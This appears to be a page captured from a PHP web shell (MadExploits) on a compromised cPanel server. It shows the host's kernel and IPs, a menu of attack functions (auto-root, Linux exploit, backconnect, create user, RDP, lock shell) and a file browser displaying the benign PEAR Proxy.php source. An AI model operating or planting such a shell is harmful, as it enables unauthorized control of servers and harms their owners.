Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.149.250.65
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
cpanel /
ea-php56 /
root /
usr /
share /
pear /
PEAR /
[ HOME SHELL ]
Name
Size
Permission
Action
ChannelFile
[ DIR ]
drwxr-xr-x
Command
[ DIR ]
drwxr-xr-x
Downloader
[ DIR ]
drwxr-xr-x
Frontend
[ DIR ]
drwxr-xr-x
Installer
[ DIR ]
drwxr-xr-x
PackageFile
[ DIR ]
drwxr-xr-x
REST
[ DIR ]
drwxr-xr-x
Task
[ DIR ]
drwxr-xr-x
Validator
[ DIR ]
drwxr-xr-x
Builder.php
18.5
KB
-rw-r--r--
ChannelFile.php
49.65
KB
-rw-r--r--
Command.php
12.14
KB
-rw-r--r--
Common.php
25.85
KB
-rw-r--r--
Config.php
67.7
KB
-rw-r--r--
Dependency2.php
49.26
KB
-rw-r--r--
DependencyDB.php
23.6
KB
-rw-r--r--
Downloader.php
64.46
KB
-rw-r--r--
ErrorStack.php
33.01
KB
-rw-r--r--
Exception.php
13.61
KB
-rw-r--r--
Frontend.php
6.49
KB
-rw-r--r--
Installer.php
68.45
KB
-rw-r--r--
PackageFile.php
15.47
KB
-rw-r--r--
Packager.php
7.53
KB
-rw-r--r--
Proxy.php
5.48
KB
-rw-r--r--
REST.php
16.32
KB
-rw-r--r--
Registry.php
74.03
KB
-rw-r--r--
RunTest.php
35.23
KB
-rw-r--r--
Validate.php
21.49
KB
-rw-r--r--
XMLParser.php
6.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Proxy.php
<?php /** * PEAR_Proxy * * HTTP Proxy handling * * @category pear * @package PEAR * @author Nico Boehr * @copyright 1997-2009 The Authors * @license http://opensource.org/licenses/bsd-license.php New BSD License * @link http://pear.php.net/package/PEAR */ class PEAR_Proxy { var $config = null; /** * @access private */ var $proxy_host; /** * @access private */ var $proxy_port; /** * @access private */ var $proxy_user; /** * @access private */ var $proxy_pass; /** * @access private */ var $proxy_schema; function __construct($config = null) { $this->config = $config; $this->_parseProxyInfo(); } /** * @access private */ function _parseProxyInfo() { $this->proxy_host = $this->proxy_port = $this->proxy_user = $this->proxy_pass = ''; if ($this->config->get('http_proxy')&& $proxy = parse_url($this->config->get('http_proxy')) ) { $this->proxy_host = isset($proxy['host']) ? $proxy['host'] : null; $this->proxy_port = isset($proxy['port']) ? $proxy['port'] : 8080; $this->proxy_user = isset($proxy['user']) ? urldecode($proxy['user']) : null; $this->proxy_pass = isset($proxy['pass']) ? urldecode($proxy['pass']) : null; $this->proxy_schema = (isset($proxy['scheme']) && $proxy['scheme'] == 'https') ? 'https' : 'http'; } } /** * @access private */ function _httpConnect($fp, $host, $port) { fwrite($fp, "CONNECT $host:$port HTTP/1.1\r\n"); fwrite($fp, "Host: $host:$port\r\n"); if ($this->getProxyAuth()) { fwrite($fp, 'Proxy-Authorization: Basic ' . $this->getProxyAuth() . "\r\n"); } fwrite($fp, "\r\n"); while ($line = trim(fgets($fp, 1024))) { if (preg_match('|^HTTP/1.[01] ([0-9]{3}) |', $line, $matches)) { $code = (int)$matches[1]; /* as per RFC 2817 */ if ($code < 200 || $code >= 300) { return PEAR::raiseError("Establishing a CONNECT tunnel through proxy failed with response code $code"); } } } // connection was successful -- establish SSL through // the tunnel $crypto_method = STREAM_CRYPTO_METHOD_TLS_CLIENT; if (defined('STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT')) { $crypto_method |= STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT; $crypto_method |= STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT; } // set the correct hostname for working hostname // verification stream_context_set_option($fp, 'ssl', 'peer_name', $host); // blocking socket needed for // stream_socket_enable_crypto() // see // <http://php.net/manual/en/function.stream-socket-enable-crypto.php> stream_set_blocking ($fp, true); $crypto_res = stream_socket_enable_crypto($fp, true, $crypto_method); if (!$crypto_res) { return PEAR::raiseError("Could not establish SSL connection through proxy: $crypto_res"); } return true; } /** * get the authorization information for the proxy, encoded to be * passed in the Proxy-Authentication HTTP header. * @return null|string the encoded authentication information if a * proxy and authentication is configured, null * otherwise. */ function getProxyAuth() { if ($this->isProxyConfigured() && $this->proxy_user != '') { return base64_encode($this->proxy_user . ':' . $this->proxy_pass); } return null; } function getProxyUser() { return $this->proxy_user; } /** * Check if we are configured to use a proxy. * * @return boolean true if we are configured to use a proxy, false * otherwise. * @access public */ function isProxyConfigured() { return $this->proxy_host != ''; } /** * Open a socket to a remote server, possibly involving a HTTP * proxy. * * If an HTTP proxy has been configured (http_proxy PEAR_Config * setting), the proxy will be used. * * @param string $host the host to connect to * @param string $port the port to connect to * @param boolean $secure if true, establish a secure connection * using TLS. * @access public */ function openSocket($host, $port, $secure = false) { if ($this->isProxyConfigured()) { $fp = @fsockopen( $this->proxy_host, $this->proxy_port, $errno, $errstr, 15 ); if (!$fp) { return PEAR::raiseError("Connection to the proxy failed: $errstr", -9276); } /* HTTPS is to be used and we have a proxy, use CONNECT verb */ if ($secure) { $res = $this->_httpConnect($fp, $host, $port); if (PEAR::isError($res)) { return $res; } } } else { if ($secure) { $host = 'ssl://' . $host; } $fp = @fsockopen($host, $port, $errno, $errstr); if (!$fp) { return PEAR::raiseError("Connection to `$host:$port' failed: $errstr", $errno); } } return $fp; } }
Close